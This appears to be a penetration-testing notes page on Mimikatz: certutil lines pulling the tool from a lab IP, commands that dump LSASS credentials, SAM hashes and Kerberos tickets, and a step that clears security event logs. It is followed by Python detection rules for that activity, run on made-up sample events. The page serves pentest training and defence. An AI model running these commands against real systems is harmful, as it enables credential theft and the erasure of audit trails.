akde/infosec

Information security is ultimately about managing risk


Windows creates and stores credentials in the Local Security Authority Subsystem Service (LSASS) in memory. On the filesystem, the SAM database stores the password hashes.

Use Mimikatz

  • as standalone
    • If you need to copy the files:
      certutil.exe -urlcache -split -f "http://192.168.119.158:8000/mimidrv.sys" mimidrv.sys
      certutil.exe -urlcache -split -f "http://192.168.119.158:8000/mimikatz.exe" mimikatz.exe
      certutil.exe -urlcache -split -f "http://192.168.119.158:8000/mimilib.dll" mimilib.dll
  • as Meterpreter module
    load mimikatz
    mimikatz_command -f samdump::hashes
    mimikatz_command -f sekurlsa::searchPasswords
    mimikatz_command -f sekurlsa::logonPasswords
    ...
  • as PowerShell Empire module
  • Multiple commands can be chained for non-interactive execution:
    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
    mimikatz.exe "privilege::debug" "lsadump::sam" exit

Usage

Enable debug mode. This enables SeDebugPrivilege so that Mimikatz can open handles to other processes (such as LSASS).

privilege::debug

Try to elevate privileges to obtain SYSTEM user privileges:

token::elevate

Get contents of the SAM database:

lsadump::sam

Dump the credentials held in LSASS:

sekurlsa::logonpasswords
  • Tip: Use the following bash lines to extract the hashes into a file for hashcat (sort -u instead of uniq, since uniq only collapses adjacent duplicates):
    grep NTLM securlsa_logonpasswords.txt | cut -d" " -f9 | sort -u
    grep SHA1 securlsa_logonpasswords.txt | cut -d" " -f9 | sort -u

Get (Kerberos) tickets:

  1. Connect to a system via Kerberos. For example, try to list a share:
    PS> dir \\host.dom.ain\backup
  2. Now, list the tickets:
    sekurlsa::tickets

Kerberos

Ask for a TGS ticket from a service.

Requires:

  • User account
  • Service Principal Name (SPN) of the service

kerberos::ask /target:HTTP/svMSSQL.svcorp.com

Various

Delete event logs

Clear all (!) security event logs:

privilege::debug
event::drop
event::clear
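Every step on this page leaves a trace that a defender can look for: the certutil download lines (Sysmon Event ID 1 / Security 4688 with command-line auditing), the Mimikatz module syntax in the non-interactive invocations, the handle that sekurlsa::logonpasswords needs on lsass.exe (Sysmon Event ID 10 with PROCESS_VM_READ), the RC4 service ticket that kerberos::ask typically requests (Security Event ID 4769, etype 0x17), and the event::clear step (Security Event ID 1102). The following detection rules are an added example, not part of the original notes; the event dictionaries are constructed for illustration, the field names are an assumption of this example rather than a vendor schema, and the allowlist is a placeholder to tune per environment.

```python
"""Added example (not from the original notes): detection rules for the LSASS,
Kerberos and log-clearing activity this page documents, run over constructed
sample events shaped like parsed Windows Security / Sysmon records."""

import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]

# Constructed allowlist: processes that legitimately open LSASS with read
# access on many hosts. Tune per environment; this is an assumption.
LSASS_READ_ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
}

# Module syntax seen in the Mimikatz commands on this page.
MIMIKATZ_CMDLINE = re.compile(
    r"(privilege::debug|sekurlsa::|lsadump::|kerberos::|event::|token::elevate)",
    re.IGNORECASE,
)

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory


def rule_certutil_download(ev: Event) -> bool:
    """Sysmon EID 1: certutil -urlcache -f used to fetch a remote file."""
    if ev.get("source") != "Sysmon" or ev.get("id") != 1:
        return False
    image = str(ev.get("image", "")).lower()
    cmd = str(ev.get("cmdline", "")).lower()
    return image.endswith("certutil.exe") and "-urlcache" in cmd and "-f" in cmd and "http" in cmd


def rule_mimikatz_cmdline(ev: Event) -> bool:
    """Sysmon EID 1 or Security 4688 (command-line auditing): Mimikatz module syntax."""
    if ev.get("id") not in (1, 4688):
        return False
    return MIMIKATZ_CMDLINE.search(str(ev.get("cmdline", ""))) is not None


def rule_lsass_memory_read(ev: Event) -> bool:
    """Sysmon EID 10: a non-allowlisted process got PROCESS_VM_READ on lsass.exe."""
    if ev.get("source") != "Sysmon" or ev.get("id") != 10:
        return False
    if not str(ev.get("target_image", "")).lower().endswith(r"\lsass.exe"):
        return False
    if str(ev.get("source_image", "")).lower() in LSASS_READ_ALLOWLIST:
        return False
    granted = int(str(ev.get("granted_access", "0x0")), 16)  # Sysmon logs hex text
    return bool(granted & PROCESS_VM_READ)


def rule_rc4_tgs_request(ev: Event) -> bool:
    """Security EID 4769: RC4 (0x17) service ticket for a non-machine, non-krbtgt SPN."""
    if ev.get("id") != 4769 or ev.get("status", "0x0") != "0x0":
        return False
    service = str(ev.get("service_name", ""))
    if service.endswith("$") or service.lower() == "krbtgt":
        return False
    return str(ev.get("ticket_etype", "")).lower() == "0x17"


def rule_audit_log_cleared(ev: Event) -> bool:
    """Security EID 1102: the Security event log was cleared."""
    return ev.get("source") == "Security" and ev.get("id") == 1102


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("certutil_download", rule_certutil_download),
    ("mimikatz_cmdline", rule_mimikatz_cmdline),
    ("lsass_memory_read", rule_lsass_memory_read),
    ("rc4_tgs_request", rule_rc4_tgs_request),
    ("audit_log_cleared", rule_audit_log_cleared),
]


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS: List[Event] = [
    {"source": "Sysmon", "id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": 'certutil.exe -urlcache -split -f "http://192.168.119.158:8000/mimikatz.exe" mimikatz.exe'},
    {"source": "Sysmon", "id": 1, "image": r"C:\Users\u\mimikatz.exe",
     "cmdline": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"source": "Sysmon", "id": 10, "source_image": r"C:\Users\u\mimikatz.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"source": "Sysmon", "id": 10, "source_image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},  # allowlisted
    {"source": "Security", "id": 4769, "account": "user@SVCORP.COM",
     "service_name": "svMSSQL", "ticket_etype": "0x17", "status": "0x0"},
    {"source": "Security", "id": 4769, "account": "user@SVCORP.COM",
     "service_name": "svMSSQL", "ticket_etype": "0x12", "status": "0x0"},  # AES: normal
    {"source": "Security", "id": 1102, "account": "admin"},
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The LSASS rule keys on the access mask rather than on the tool name, because the 0x1010 / 0x1410 masks are what any credential dumper needs regardless of how the binary is renamed; the allowlist is what keeps the rule from firing on endpoint protection that also reads LSASS. The 4769 rule excludes machine accounts and krbtgt so that it reflects service tickets a user would request for a named SPN, as in the kerberos::ask line above.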

Resources
